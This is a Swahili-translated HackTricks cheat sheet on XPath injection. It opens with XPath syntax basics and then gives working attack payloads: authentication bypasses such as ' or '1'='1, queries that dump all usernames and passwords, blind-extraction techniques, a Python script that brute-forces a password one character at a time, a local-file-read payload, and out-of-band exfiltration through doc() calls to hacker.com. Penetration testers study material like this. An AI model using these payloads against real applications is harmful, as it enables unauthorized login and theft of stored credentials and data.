mirror of
https://github.com/carlospolop/hacktricks
synced 2025-02-16 22:18:27 +00:00
14 KiB
14 KiB
Uingizaji wa XPATH
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa kipekee wa NFTs
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Jiunge na HackenProof Discord server ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa zawadi za mdudu!
Machapisho ya Udukuzi
Shiriki na yaliyomo yanayochimba katika msisimko na changamoto za udukuzi
Habari za Udukuzi za Wakati Halisi
Kaa sasa na ulimwengu wa udukuzi wenye kasi kupitia habari za wakati halisi na ufahamu
Matangazo ya Karibuni
Baki mwelewa na zawadi mpya za mdudu zinazoanzishwa na sasisho muhimu za jukwaa
Jiunge nasi kwenye Discord na anza kushirikiana na wadukuzi bora leo!
Sintaksia Msingi
Mbinu ya mashambulizi inayojulikana kama Uingizaji wa XPath hutumiwa kuchukua faida ya programu ambazo hufanya maswali ya XPath (Lugha ya Njia ya XML) kulingana na matokeo ya mtumiaji ili kuuliza au kutembea nyaraka za XML.
Nodes Zilizoelezwa
Majedwali hutumiwa kuchagua nodes mbalimbali katika hati ya XML. Majedwali haya na maelezo yake yameorodheshwa hapa chini:
- nodename: Nodes zote zenye jina "nodename" zinachaguliwa.
- /: Uchaguzi unafanywa kutoka kwa node ya msingi.
- //: Nodes zinazolingana na uchaguzi kutoka kwa node ya sasa zinachaguliwa, bila kujali mahali walipo kwenye hati.
- .: Node ya sasa imechaguliwa.
- ..: Mzazi wa node ya sasa umechaguliwa.
- @: Vipengele vinachaguliwa.
Mifano ya XPath
Mifano ya maelezo ya njia na matokeo yake ni pamoja na:
- bookstore: Nodes zote zenye jina "bookstore" zinachaguliwa.
- /bookstore: Kipengele cha msingi cha duka la vitabu kimechaguliwa. Inasisitizwa kuwa njia kamili kwa kipengele ni kuanzia na mshale (/).
- bookstore/book: Vitabu vyote vinavyokuwa watoto wa duka la vitabu vimechaguliwa.
- //book: Vitabu vyote katika hati zinachaguliwa, bila kujali mahali walipo.
- bookstore//book: Vitabu vyote vinavyokuwa wazao wa kipengele cha duka la vitabu vimechaguliwa, bila kujali nafasi yao chini ya kipengele cha duka la vitabu.
- //@lang: Vipengele vyote vyenye jina la lang vinachaguliwa.
Matumizi ya Predicates
Predicates hutumiwa kurekebisha uchaguzi:
- /bookstore/book[1]: Kipengele cha kwanza cha kitabu kilichokuwa mtoto wa kipengele cha duka la vitabu kimechaguliwa. Mbinu ya kuzunguka kwa IE toleo 5 hadi 9, ambayo inaorodhesha node ya kwanza kama [0], ni kuweka SelectionLanguage kuwa XPath kupitia JavaScript.
- /bookstore/book[last()]: Kipengele cha mwisho cha kitabu kilichokuwa mtoto wa kipengele cha duka la vitabu kimechaguliwa.
- /bookstore/book[last()-1]: Kipengele cha kitabu cha mwisho kabla ya mwisho kilichokuwa mtoto wa kipengele cha duka la vitabu kimechaguliwa.
- /bookstore/book[position()<3]: Vitabu viwili vya kwanza vilivyokuwa watoto wa kipengele cha duka la vitabu vimechaguliwa.
- //title[@lang]: Vipengele vyote vya kichwa chenye sifa ya lang vinachaguliwa.
- //title[@lang='en']: Vipengele vyote vya kichwa chenye sifa ya "lang" yenye thamani ya "en" vinachaguliwa.
- /bookstore/book[price>35.00]: Vitabu vyote vya duka la vitabu vyenye bei kubwa kuliko 35.00 vinachaguliwa.
- /bookstore/book[price>35.00]/title: Vipengele vyote vya kichwa vya vitabu vya duka la vitabu vyenye bei kubwa kuliko 35.00 vinachaguliwa.
Kushughulikia Nodes Zisizojulikana
Vidole vya mguu hutumiwa kwa kulinganisha nodes zisizojulikana:
- *: Inalinganisha kipengele chochote cha node.
- @*: Inalinganisha kipengele chochote cha sifa ya node.
- node(): Inalinganisha node yoyote ya aina yoyote.
Mifano zaidi ni pamoja na:
- /bookstore/*: Inachagua nodes za watoto zote za kipengele cha duka la vitabu.
- //*: Inachagua vipengele vyote katika hati.
- //title[@*]: Inachagua vipengele vyote vya kichwa chenye angalau sifa moja ya aina yoyote.
Mfano
<?xml version="1.0" encoding="ISO-8859-1"?>
<data>
<user>
<name>pepe</name>
<password>peponcio</password>
<account>admin</account>
</user>
<user>
<name>mark</name>
<password>m12345</password>
<account>regular</account>
</user>
<user>
<name>fino</name>
<password>fino2</password>
<account>regular</account>
</user>
</data>
Pata ufikiaji wa habari
All names - [pepe, mark, fino]
name
//name
//name/node()
//name/child::node()
user/name
user//name
/user/name
//user/name
All values - [pepe, peponcio, admin, mark, ...]
//user/node()
//user/child::node()
Positions
//user[position()=1]/name #pepe
//user[last()-1]/name #mark
//user[position()=1]/child::node()[position()=2] #peponcio (password)
Functions
count(//user/node()) #3*3 = 9 (count all values)
string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe" = 4
substrig(//user[position()=2/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"
Kutambua & kuiba mpangilio
and count(/*) = 1 #root
and count(/*[1]/*) = 2 #count(root) = 2 (a,c)
and count(/*[1]/*[1]/*) = 1 #count(a) = 1 (b)
and count(/*[1]/*[1]/*[1]/*) = 0 #count(b) = 0
and count(/*[1]/*[2]/*) = 3 #count(c) = 3 (d,e,f)
and count(/*[1]/*[2]/*[1]/*) = 0 #count(d) = 0
and count(/*[1]/*[2]/*[2]/*) = 0 #count(e) = 0
and count(/*[1]/*[2]/*[3]/*) = 1 #count(f) = 1 (g)
and count(/*[1]/*[2]/*[3]/[1]*) = 0 #count(g) = 0
#The previous solutions are the representation of a schema like the following
#(at this stage we don't know the name of the tags, but jus the schema)
<root>
<a>
<b></b>
</a>
<c>
<d></d>
<e></e>
<f>
<h></h>
</f>
</c>
</root>
and name(/*[1]) = "root" #Confirm the name of the first tag is "root"
and substring(name(/*[1]/*[1]),1,1) = "a" #First char of name of tag `<a>` is "a"
and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1)) = 105 #Firts char of tag `<b>`is codepoint 105 ("i") (https://codepoints.net/)
#Stealing the schema via OOB
doc(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
Kupuuza Uthibitisho
Mfano wa maswali:
string(//user[name/text()='+VAR_USER+' and password/text()='+VAR_PASSWD+']/account/text())
$q = '/usuarios/usuario[cuenta="' . $_POST['user'] . '" and passwd="' . $_POST['passwd'] . '"]';
Kupita OR katika jina la mtumiaji na nenosiri (thamani sawa katika zote mbili)
' or '1'='1
" or "1"="1
' or ''='
" or ""="
string(//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']/account/text())
Select account
Select the account using the username and use one of the previous values in the password field
Kutumia null injection
Username: ' or 1]%00
Double OR katika Jina la mtumiaji au katika nenosiri (ni halali na uwanja mmoja ulio hatarini)
MUHIMU: Tafadhali kumbuka kwamba "na" ni operesheni ya kwanza inayofanywa.
Bypass with first match
(This requests are also valid without spaces)
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
string(//user[name/text()='' or true() or '' and password/text()='']/account/text())
Select account
'or string-length(name(.))<10 or' #Select account with length(name)<10
'or contains(name,'adm') or' #Select first account having "adm" in the name
'or contains(.,'adm') or' #Select first account having "adm" in the current value
'or position()=2 or' #Select 2º account
string(//user[name/text()=''or position()=2 or'' and password/text()='']/account/text())
Select account (name known)
admin' or '
admin' or '1'='2
string(//user[name/text()='admin' or '1'='2' and password/text()='']/account/text())
Kunasa Nakala
Matokeo yana nakala na mtumiaji anaweza kubadilisha thamani za kutafuta:
/user/username[contains(., '+VALUE+')]
') or 1=1 or (' #Get all names
') or 1=1] | //user/password[('')=(' #Get all names and passwords
') or 2=1] | //user/node()[('')=(' #Get all values
')] | //./node()[('')=(' #Get all values
')] | //node()[('')=(' #Get all values
') or 1=1] | //user/password[('')=(' #Get all names and passwords
')] | //password%00 #All names and passwords (abusing null injection)
')]/../*[3][text()!=(' #All the passwords
')] | //user/*[1] | a[(' #The ID of all users
')] | //user/*[2] | a[(' #The name of all users
')] | //user/*[3] | a[(' #The password of all users
')] | //user/*[4] | a[(' #The account of all users
Utekaji wa Kipofu
Pata urefu wa thamani na uitoe kwa kulinganisha:
' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''=' #True if length equals 4
' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''=' #True is first equals "a"
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
... and ( if ( $employee/role = 2 ) then error() else 0 )... #When error() is executed it rises an error and never returns a value
Mfano wa Python
import requests, string
flag = ""
l = 0
alphabet = string.ascii_letters + string.digits + "{}_()"
for i in range(30):
r = requests.get("http://example.com?action=user&userid=2 and string-length(password)=" + str(i))
if ("TRUE_COND" in r.text):
l = i
break
print("[+] Password length: " + str(l))
for i in range(1, l + 1): #print("[i] Looking for char number " + str(i))
for al in alphabet:
r = requests.get("http://example.com?action=user&userid=2 and substring(password,"+str(i)+",1)="+al)
if ("TRUE_COND" in r.text):
flag += al
print("[+] Flag: " + flag)
break
Soma faili
(substring((doc('file://protected/secret.xml')/*[1]/*[1]/text()[1]),3,1))) < 127
Uchunguzi wa OOB
doc(concat("http://hacker.com/oob/", RESULTS))
doc(concat("http://hacker.com/oob/", /Employees/Employee[1]/username))
doc(concat("http://hacker.com/oob/", encode-for-uri(/Employees/Employee[1]/username)))
#Instead of doc() you can use the function doc-available
doc-available(concat("http://hacker.com/oob/", RESULTS))
#the doc available will respond true or false depending if the doc exists,
#user not(doc-available(...)) to invert the result if you need to
Zana ya Kiotomatiki
Marejeo
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection
- https://wiki.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)
- https://www.w3schools.com/xml/xpath_syntax.asp
Jiunge na HackenProof Discord server ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za udhaifu!
Machapisho ya Kudukua
Shiriki na maudhui yanayochimba kina katika msisimko na changamoto za kudukua
Taarifa za Kudukua za Wakati Halisi
Kaa sawa na ulimwengu wa kudukua wenye kasi kupitia taarifa za habari za wakati halisi na ufahamu
Matangazo ya Karibuni
Baki mwelewa na tuzo mpya za udhaifu zinazoanzishwa na sasisho muhimu za jukwaa
Jiunge nasi kwenye Discord na anza kushirikiana na wadukuzi bora leo!
Jifunze kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.